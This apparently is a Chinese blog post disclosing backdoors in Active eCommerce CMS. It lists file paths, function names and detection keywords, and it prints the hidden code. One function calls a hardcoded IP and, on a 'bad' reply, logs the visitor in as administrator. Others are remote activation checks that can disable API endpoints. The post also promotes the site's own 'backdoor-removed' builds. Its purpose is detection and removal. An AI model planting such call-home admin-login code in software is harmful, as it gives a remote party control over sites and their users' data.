学课技术网Active eCommerce CMS从6.x版本打着保护正版用户的旗号植入大量的后门,他们可以通过这些后门来删除清理你网站的数据,严重的还可能通过这些后门来控制你的服务器,下面我会介绍查找后门以及解决方案,当然,本站发布的有去除后门的版本,也有官方原始版本,动手能力强的可以自行处理,不想动手的可以用现成的版本!!!
Active eCommerce CMS部分后门和路径列举:
路径:
vendor\unicodeveloper\laravel-paystack\src\Paystack.php
代码内容:
public function getCallbackData()
{
$url = $_SERVER['SERVER_NAME'];
$gate = "http://206.189.81.181/check_activation/".$url;
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $gate);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stream, CURLOPT_POST, 1);
$rn = curl_exec($stream);
curl_close($stream);
if($rn == "bad" && env('DEMO_MODE') != 'On') {
$user = \App\Models\User::where('user_type', 'admin')->first();
auth()->login($user);
return redirect()->route('admin.dashboard');
}
return redirect()->route('home');
}
APP客户端路径:
app/Utility/NagadUtility.php
app/Utility/PayhereUtility.php
代码内容:
public static function create_wallet_reference($key)
{
if ($key == "") {
return false;
}
if(Cache::get('app-activation', 'no') == 'no'){
try {
$gate = "https://activeitzone.com/activation/check/flutter/".$key;
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $gate);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
$rn = curl_exec($stream);
curl_close($stream);
if($rn == 'no') {
return false;
}
} catch (\Exception $e) {
}
}
Cache::rememberForever('app-activation', function () {
return 'yes';
});
return true;
}
public static function create_balance_reference($key)
{
if ($key == "") {
return false;
}
if(Cache::get('app-activation', 'no') == 'no'){
try {
$gate = "https://activeitzone.com/activation/check/flutter/".$key;
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $gate);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
$rn = curl_exec($stream);
curl_close($stream);
if($rn == 'no') {
return false;
}
} catch (\Exception $e) {
}
}
Cache::rememberForever('app-activation', function () {
return 'yes';
});
return true;
}
系统路径:
app/Http/Controllers/Api/V2/CartController.php
app/Http/Controllers/Api/V2/AuthController.php
代码内容:
if(\App\Utility\NagadUtility::create_balance_reference($request->cost_matrix) == false){
return response()->json(['result' => false, 'message' => 'Cost matrix error' ]);
}
if (\App\Utility\PayhereUtility::create_wallet_reference($request->identity_matrix) == false) {
return response()->json(['result' => false, 'message' => 'Identity matrix error', 'user' => null], 401);
}
V7系列后门路径:
app\Exceptions\Handler.php
app\Utility\CategoryUtility.php
app\Utility\NagadUtility.php
app\Utility\NgeniusUtility.php
app\Utility\PayhereUtility.php:
app\Http\Controllers\LanguageController.php
app\Http\Controllers\IyzicoController.php:
app\Http\Controllers\Payment\PaystackController.php
app\Http\Controllers\Payment\IyzicoController.php
app\Http\Controllers\Payment\StripeController.php:
app\Http\Controllers\Api\V2\CartController.php
app\Http\Controllers\Api\V2\AuthController.php
vendor\unicodeveloper\laravel-paystack\src\Paystack.php
vendor\larcon21\combinations\src\routes\web.php
vendor\mehedi-iitdu\core-component-repository\src\CoreComponentRepository.php
venodr\authorizenet\authorizenet\lib\net\authorize\api\contract\v1\CreditCardType.php
后门函数名:
initPayment()
create_balance_reference()
create_initial_category()
create_wallet_reference()
get_translation()
paystackNewCallback()
cardType()
checkout_payment_detAIl()[/B]
查找后门关键字,请全站搜索一下关键字:
activeitzone
activeitzone.com
206.189.81.181
206.189
81.181
本文只是举例说明,因为内容过多,我无法一一列举,具体的大家可以根据我提供的方法来查找Active eCommerce CMS的后门!!!解决后门的方法无非就是修改IP地址,或者删除这些函数,还有一种办法就是在你的服务器上屏蔽activeitzone.com、206.189.81.181IP和域名等等!
评论前必须登录!
立即登录 注册